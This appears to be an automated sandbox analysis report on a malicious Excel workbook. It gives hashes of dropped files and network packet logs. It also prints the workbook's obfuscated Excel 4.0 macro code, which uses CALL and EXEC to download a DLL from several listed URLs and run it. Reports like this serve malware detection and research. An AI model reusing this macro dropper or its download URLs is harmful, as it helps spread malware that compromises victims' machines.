                                                                        SHA-512:83F16BCA5EA4062470B8807912F10B6D743C2DEF2261B4E16098EA8FC1DCB6692CBBD4C6870F27408422B75A3CDCD46A3856AB2162177ED2386D4B8188C122E8
                                                                        Malicious:true
                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                        C:\Users\user\fikftkm.thj2
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):129731
                                                                        Entropy (8bit):5.747848755116591
                                                                        Encrypted:false
                                                                        SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                                                                        MD5:9BDF7C3BDB07C77AB4AE0BECC716B6D0
                                                                        SHA1:C5B2ED793BCFE4D96B2CE93B202B2F551AFB8C87
                                                                        SHA-256:4106E859C225B6FED690E1640CC98E4808E1FF7C5CB041C18493996B04805E48
                                                                        SHA-512:117EFAABE33020EE1C14924D1FB19FE57F2DE6E3FEAB007F3B9A117931479585188500D0B50854CD7D2D85003D00AB313BB662D02571BC4C834FAA25E6360216
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\fikftkm.thj3
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                        Category:dropped
                                                                        Size (bytes):7624
                                                                        Entropy (8bit):5.642596381720329
                                                                        Encrypted:false
                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJf0:QJvVGaRF8I80
                                                                        MD5:190F2D4BCDE1E366EAAB903C29C7A699
                                                                        SHA1:346D44A0619C97AA226EF52F146F9A133F4DCAAF
                                                                        SHA-256:20C2D643754869BA5763DDC6289A0FADBBF2DE81236F1F80B7FA3588B14F6EBB
                                                                        SHA-512:AB3C39F0B6A07F798E9546FA882BE0D850F88337DFBFBF7A797A67B43CC1EA8718C842619E4FE169FD3A6FE270C39866F6B4DBB0187612B2840A6474D0E26BB6
                                                                        Malicious:false
                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                                                        Static File Info

                                                                        General

                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Apr 1 10:53:30 2021, Security: 0
                                                                        Entropy (8bit):5.512375299027175
                                                                        TrID:
                                                                        • Microsoft Excel sheet (30009/1) 78.94%
                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                        File name:document-1245492889.xls
                                                                        File size:184832
                                                                        MD5:e30c71417d7675c13ca725d3bb4172eb
                                                                        SHA1:80350061fb497c3fc79ac2cd4f8a315aceae412e
                                                                        SHA256:05d2f75e43502476f32925c3f8ca82245c4f5433c4d405779e6fd178cd37ea13
                                                                        SHA512:4f2f96126cc2bde21292a0ac85ffa04799915f57750356bf1957313b7c353efc469172362ba66691b7417553a3e7eca1e14c8ad75462ce524da8041d785aa641
                                                                        SSDEEP:1536:4PrixIEudkLeXf1D5XUY//wBf8orsYwbKynDLmAMo5VjP2/zaUv:4PmxIEudkLeXPD/PjYwe2DMo3S/7
                                                                        File Content Preview:........................>.......................g...........................d...e...f..........................................................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:e4eea286a4b4bcb4

                                                                        Static OLE Info

                                                                        General

                                                                        Document Type:OLE
                                                                        Number of OLE Files:1

                                                                        OLE File "document-1245492889.xls"

                                                                        Indicators

                                                                        Has Summary Info:True
                                                                        Application Name:Microsoft Excel
                                                                        Encrypted Document:False
                                                                        Contains Word Document Stream:False
                                                                        Contains Workbook/Book Stream:True
                                                                        Contains PowerPoint Document Stream:False
                                                                        Contains Visio Document Stream:False
                                                                        Contains ObjectPool Stream:
                                                                        Flash Objects Count:
                                                                        Contains VBA Macros:True

                                                                        Summary

                                                                        Code Page:1251
                                                                        Author:
                                                                        Last Saved By:
                                                                        Create Time:2006-09-16 00:00:00
                                                                        Last Saved Time:2021-04-01 09:53:30
                                                                        Creating Application:Microsoft Excel
                                                                        Security:0

                                                                        Document Summary

                                                                        Document Code Page:1251
                                                                        Thumbnail Scaling Desired:False
                                                                        Contains Dirty Links:False
                                                                        Shared Document:False
                                                                        Changed Hyperlinks:False
                                                                        Application Version:1048576

                                                                        Streams

                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                        General
                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                        File Type:data
                                                                        Stream Size:4096
                                                                        Entropy:0.354263933307
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 3 . . . . . D o c 1 . . . . . D o c 2 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . .
                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b0 00 00 00 02 00 00 00 e3 04 00 00
                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                        General
                                                                        Stream Path:\x5SummaryInformation
                                                                        File Type:data
                                                                        Stream Size:4096
                                                                        Entropy:0.251653152424
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 173850
                                                                        General
                                                                        Stream Path:Workbook
                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                        Stream Size:173850
                                                                        Entropy:5.72116035247
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 ! . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 04 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                        Macro 4.0 Code

                                                                        ,,,,,,,,,,,,,,,,,,,,=CHAR(85),,,,=CHAR(74),,=CHAR(114),,=CHAR(44),,,,,,=CHAR(82),,,,=CHAR(74),,=CHAR(117),,=CHAR(68),,,,,,=CHAR(76),,,,=CHAR(67),,=CHAR(110),,=CHAR(108),,,,,,=CHAR(77),,,,=CHAR(67),,=CHAR(100),,=CHAR(108)"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)",,,,,,=CHAR(111),,,,=CHAR(66),,=CHAR(108),,=CHAR(82),,,,,,=CHAR(110),,,,=CHAR(66),,=CHAR(108),,=CHAR(101),,,,,,,,,,,,=CHAR(51),,=CHAR(103),,,,,,,,,,,,,,=CHAR(105),,,,,,,,,,,,,,=CHAR(115),,,,,,,,,,,,,,=CHAR(116)"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=CALL(""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A200&Doc1!C200,Doc1!E201,0,0)",,,,,,,,,,,,,,=CHAR(101)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A201&Doc1!C201,Doc1!E201&""1"",0,0)",,,,,,,,,,,,,,=CHAR(114)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A202&Doc1!C202,Doc1!E201&""2"",0,0)",,,,,,=CHAR(40+45),,,,,,,,=CHAR(83)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A203&Doc1!C203,Doc1!E201&""3"",0,0)",,,,,,=CHAR(22+60),,,,,,,,=CHAR(101)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A204&Doc1!C204,Doc1!E201&""4"",0,0)",,,,,,=CHAR(6+70),,,,,,,,=CHAR(114)=Doc1!H206(),,,,,,,,,,,,,,=CHAR(118),,,,,,,,,,,,,,=CHAR(101),,,,,,,,,,,,,,=CHAR(114),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,h,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                        ,,,,,,,,,vts.us.com/ds/0104.,,gif,,,,,,,mundotecnologiasolar.com/ds/0104.,,gif,,..\fikftkm.thj,,,,,accesslinksgroup.com/ds/0104.,,gif,,,,,,,ponchokhana.com/ds/0104.,,gif,,,,,,,comosairdoburaco.com.br/ds/0104.,,gif,,,,,,,,,,,,,,,,,,,,,,,"=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=EXEC(Doc2!CE2&Doc2!CE3&Doc2!CE4&Doc2!CE5&Doc2!CE6&Doc2!CE7&Doc2!CE8&""2 ""&before.2.198.0.sheet!E201&Doc2!CG2&Doc2!CG3&Doc2!CG4&Doc2!CG5&Doc2!CG6&Doc2!CG7&Doc2!CG8&Doc2!CG9&Doc2!CG10&Doc2!CG11&Doc2!CG12&Doc2!CG13&Doc2!CG14&Doc2!CG15&Doc2!CG16&Doc2!CG17&Doc2!CG18&Doc2!CG19)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)",,,,,,,,,"=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(784254

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 7, 2021 10:56:01.579391956 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:01.723526001 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:01.723622084 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:01.732597113 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:01.877059937 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:01.879154921 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:01.879179001 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:01.879266024 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:01.879318953 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:01.879334927 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:01.879381895 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:01.879406929 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:01.884533882 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:01.884634018 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:01.933315992 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:02.085320950 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:02.085558891 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.120690107 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.270613909 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.270771027 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.270812988 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.270863056 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.271159887 CEST49165443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.272412062 CEST49167443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.417540073 CEST44349165207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.417576075 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.417686939 CEST49167443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.418366909 CEST49167443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.561585903 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.563234091 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.563358068 CEST49167443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.563801050 CEST49167443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.604612112 CEST49167443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.748547077 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.808373928 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.808410883 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.808423996 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.808434010 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.808446884 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.808459044 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:03.808653116 CEST49167443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.819852114 CEST49167443192.168.2.22207.174.213.126
                                                                        Apr 7, 2021 10:56:03.963421106 CEST44349167207.174.213.126192.168.2.22
                                                                        Apr 7, 2021 10:56:04.032520056 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:04.175481081 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:04.175570965 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:04.176426888 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:04.319808960 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:04.325303078 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:04.325347900 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:04.325406075 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:04.325566053 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:04.371629000 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:04.519107103 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:04.519318104 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.042814970 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.225735903 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842266083 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842305899 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842334986 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842363119 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842391968 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842420101 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842442989 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842444897 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842463017 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842467070 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842475891 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842487097 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842521906 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842576981 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842624903 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842719078 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842757940 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.843050957 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.843111038 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989312887 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989336014 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989348888 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989361048 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989372969 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989398003 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989466906 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989484072 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989485979 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989499092 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989502907 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989506960 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989509106 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989511967 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989515066 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989542007 CEST49168443192.168.2.22162.241.62.4
